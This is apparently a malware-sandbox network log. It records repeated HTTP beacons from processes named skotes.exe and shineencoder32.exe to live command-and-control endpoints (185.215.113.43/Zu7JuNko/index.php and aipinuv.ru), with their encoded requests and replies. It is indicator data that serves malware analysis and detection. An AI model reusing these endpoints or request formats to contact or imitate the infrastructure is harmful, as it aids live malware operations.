Nov 15, 2024 14:11:02.932883024 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50088	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:04.483284950 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:11:05.479226112 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50096	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:07.146754026 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:11:08.103450060 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50108	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:09.634457111 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:11:10.547528028 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50116	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:12.194325924 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:11:13.126954079 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50117	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:13.198474884 CET	313	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c444db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692386688f817c2e89c HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:14.109080076 CET	890	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 32 61 61 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 63 36 39 35 39 61 62 37 32 65 38 36 36 61 63 33 37 34 62 63 32 66 64 64 30 30 32 63 32 34 33 63 64 37 64 62 62 31 34 66 61 32 64 38 64 32 30 66 61 31 36 61 31 37 38 63 37 35 30 62 33 65 39 34 64 65 64 35 61 37 66 34 38 65 64 32 36 36 34 38 62 33 39 36 37 39 30 66 63 31 34 64 65 65 65 39 32 39 33 33 31 63 63 36 66 39 36 31 36 64 33 35 31 38 66 32 33 61 38 35 38 62 33 65 65 34 31 32 30 65 62 37 65 63 63 66 66 37 62 62 61 38 35 65 65 64 35 34 61 65 36 33 35 63 38 31 32 33 33 34 33 35 66 32 39 66 64 32 37 37 31 30 62 37 38 62 38 65 63 38 65 66 34 38 37 32 64 35 31 65 36 35 37 37 33 32 33 65 30 32 38 35 64 66 35 65 32 65 36 38 61 66 62 32 30 37 61 61 30 65 38 34 64 39 36 38 34 66 62 37 61 32 63 31 [TRUNCATED] Data Ascii: 2aa67b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592dec6959ab72e866ac374bc2fdd002c243cd7dbb14fa2d8d20fa16a178c750b3e94ded5a7f48ed26648b396790fc14deee929331cc6f9616d3518f23a858b3ee4120eb7eccff7bba85eed54ae635c81233435f29fd27710b78b8ec8ef4872d51e6577323e0285df5e2e68afb207aa0e84d9684fb7a2c12be6ef19acfb17bd26d1b293667a656ceddad322cb9d70cba07a7a33bbbdbc93073200fd330eb18efd1bd194edb3a0dc555daed679b27b6965ea2e9d1afc82521be66b9ed149aa0b4795fa087ff28a9e0848317f316e65c9e4d6bc7bfc4fdd84164a087ec3bab6a880a30b520d63ed79c00cb5dbe300c194fcbd36f423d517b8cf68d2a2c6059418a86e97f4fa281e1b7d0222e3ea367ea8254480390bc965f13178f70775f384ae5d4d9c5f9cf630
Nov 15, 2024 14:11:16.955184937 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:17.264626026 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50119	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:14.647831917 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:11:15.554764986 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50120	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:17.178587914 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:11:18.086827993 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50121	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:17.399344921 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:18.313040972 CET	746	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 32 31 61 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 62 39 30 63 64 65 64 31 38 30 31 65 61 61 36 35 30 66 34 30 31 64 37 66 61 38 31 65 66 39 34 38 37 34 64 38 62 34 38 64 36 66 62 64 39 33 32 32 39 61 31 34 62 65 30 64 36 63 37 31 31 32 61 65 61 37 37 35 38 61 64 37 65 66 37 36 35 61 61 32 64 35 37 63 30 65 30 64 30 30 64 64 65 34 32 63 61 37 34 62 61 31 31 66 66 33 33 38 61 32 64 65 35 31 30 61 66 37 38 63 34 35 33 62 63 66 64 34 66 65 62 35 66 36 31 34 31 65 65 32 37 36 64 39 34 33 62 36 37 38 65 66 34 31 30 63 34 65 39 38 62 39 66 33 32 64 33 36 64 39 35 31 35 63 36 35 31 38 66 32 39 62 63 35 38 62 33 65 39 35 66 32 61 65 35 37 39 63 63 66 66 37 39 62 62 39 31 65 65 64 33 34 62 66 38 33 66 63 64 31 33 33 66 35 39 35 61 32 30 65 33 32 65 37 33 30 62 36 30 61 37 65 65 38 39 66 64 39 38 32 65 35 37 66 38 35 64 37 63 32 32 66 34 32 62 35 64 66 37 66 63 65 63 38 65 66 39 32 30 37 39 61 36 65 61 35 39 39 33 38 64 66 38 36 34 32 35 31 [TRUNCATED] Data Ascii: 21a67b69c953804b26b565fe95b321bd19a55fb90cded1801eaa650f401d7fa81ef94874d8b48d6fbd93229a14be0d6c7112aea7758ad7ef765aa2d57c0e0d00dde42ca74ba11ff338a2de510af78c453bcfd4feb5f6141ee276d943b678ef410c4e98b9f32d36d9515c6518f29bc58b3e95f2ae579ccff79bb91eed34bf83fcd133f595a20e32e730b60a7ee89fd982e57f85d7c22f42b5df7fcec8ef92079a6ea59938df8642513ba62ee98cbb26ed06b0636306da949cfddac272abcc30fb800b9a933bfcdd53274340ad32eea13e6dbbb074fd93617da54defb7d9f29b1885fa5eadaadc03b28bd79a3ef0b9fbebd765dbe85f627a7fd85861fe615ea5f9e4d68ceabc7fec6436da299ee3a9f0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50123	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:18.436842918 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:19.340636969 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50125	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:19.471246958 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:20.389630079 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50126	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:19.615042925 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:11:20.738903999 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Nov 15, 2024 14:11:20.743761063 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50127	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:20.740626097 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:21.693820953 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50129	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:21.815207958 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:22.731662989 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50130	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:22.365382910 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 15, 2024 14:11:23.303268909 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50131	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:22.854896069 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:23.802850962 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50133	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:23.926150084 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:24.847634077 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50134	185.215.113.43	80	2504	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:24.816371918 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 15, 2024 14:11:25.718947887 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 15 Nov 2024 13:11:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50136	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:24.972887039 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:25.885883093 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Nov 15, 2024 14:11:25.997179985 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 15, 2024 14:11:26.303184032 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 15 Nov 2024 13:11:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50139	185.208.158.202	80	7476	C:\Users\user\AppData\Local\Shine Encoder 1.4.3\shineencoder32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 14:11:26.424339056 CET	321	OUT	GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8918e4a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b417e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c1e9929c39ca66 HTTP/1.1 Host: aipinuv.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
